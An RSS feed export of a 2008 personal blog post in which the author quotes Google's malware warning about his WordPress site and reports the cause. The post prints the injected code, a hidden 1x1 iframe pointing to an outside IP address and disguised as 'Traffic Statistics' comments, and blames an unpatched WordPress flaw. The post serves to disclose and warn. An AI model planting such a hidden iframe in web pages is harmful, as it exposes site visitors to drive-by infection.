<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tom Sommer's Weblog &#187; google</title>
	<atom:link href="http://www.tomsommer.dk/tag/google/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.tomsommer.dk</link>
	<description>The Earth spins at a thousand miles an hour as we desperately try to keep from being thrown off</description>
	<lastBuildDate>Thu, 04 Feb 2010 10:09:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Malware notification from Google</title>
		<link>http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/</link>
		<comments>http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 23:38:04 +0000</pubDate>
		<dc:creator>Tom Sommer</dc:creator>
				<category><![CDATA[Ramblings]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/</guid>
		<description><![CDATA[I just received this from Google (No, it&#8217;s not fake).
Dear site owner or webmaster of tomsommer.dk,
We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on [...]]]></description>
			<content:encoded><![CDATA[<p>I just received this from Google (No, it&#8217;s not fake).</p>
<blockquote><p>Dear site owner or webmaster of tomsommer.dk,</p>
<p>We recently discovered that some of your pages can cause users to be<br />
infected with malicious software. We have begun showing a warning page<br />
to users who visit these pages by clicking a search result on Google.com.<br />
Below are some example URLs on your site which can cause users to be<br />
infected (space inserted to prevent accidental clicking in case your<br />
mail client auto-links URLs):</p>
<p><a class="moz-txt-link-freetext" href="http://tomsommer/">http://tomsommer</a> .dk/<br />
<a class="moz-txt-link-freetext" href="http://www.tomsommer/">http://www.tomsommer</a> .dk/<br />
<a class="moz-txt-link-freetext" href="http://tomsommer/">http://tomsommer</a> .dk/2007/</p>
<p>Here is a link to a sample warning page:<br />
<a class="moz-txt-link-freetext" href="http://www.google.com/interstitial?url=http%3A//tomsommer.dk/">http://www.google.com/interstitial?url=http%3A//tomsommer.dk/</a></p>
<p>We strongly encourage you to investigate this immediately to protect<br />
your visitors. Although some sites intentionally distribute malicious<br />
software, in many cases the webmaster is unaware because:</p>
<p>1) the site was compromised<br />
2) the site doesn&#8217;t monitor for malicious user-contributed content<br />
3) the site displays content from an ad network that has a malicious<br />
advertiser</p>
<p>If your site was compromised, it&#8217;s important to not only remove the<br />
malicious (and usually hidden) content from your pages, but to also<br />
identify and fix the vulnerability. We suggest contacting your hosting<br />
provider if you are unsure of how to proceed. StopBadware also has a<br />
resource page for securing compromised sites:<br />
<a class="moz-txt-link-freetext" href="http://www.stopbadware.org/home/security">http://www.stopbadware.org/home/security</a></p>
<p>Once you&#8217;ve secured your site, you can request that the warning be<br />
removed<!-- Traffic Statistics --> <!-- End Traffic Statistics --> by visiting<br />
<a class="moz-txt-link-freetext" href="http://www.google.com/support/webmasters/bin/answer.py?answer=45432">http://www.google.com/support/webmasters/bin/answer.py?answer=45432</a><br />
and requesting a review. If your site is no longer harmful to users,<br />
we will remove the warning.</p>
<p>Sincerely,<br />
Google Search Quality Team</p></blockquote>
<p>They offer NO explanation or hint as to why it was marked as containing malware.</p>
<p>I checked my source, and right enough, it appears my Wordpress installation (which I keep very much up to date, I might add) has been compromised.</p>
<p>One post suddenly contained:</p>
<blockquote>
<pre id="line209"><span class="comment">&lt;!-- Traffic Statistics --&gt;</span>&lt;<span class="start-tag">br</span><span class="error"><span class="attribute-name"> /</span></span>&gt;

&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">http://61.132.75.71/iframe/wp-stats.php </span><span class="attribute-name">width</span>=<span class="attribute-value">1 </span><span class="attribute-name">height</span>=<span class="attribute-value">1 </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">0</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;&lt;<span class="start-tag">br</span><span class="error"><span class="attribute-name"> /</span></span>&gt;

<span class="comment">&lt;!-- End Traffic Statistics --&gt;</span></pre>
</blockquote>
<p>Pretty cool service, I suspect an exploit fixed in <a href="http://wordpress.org/development/2008/02/wordpress-233/">Wordpress 2.3.3</a> was used &#8212; remember to update your shit people!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
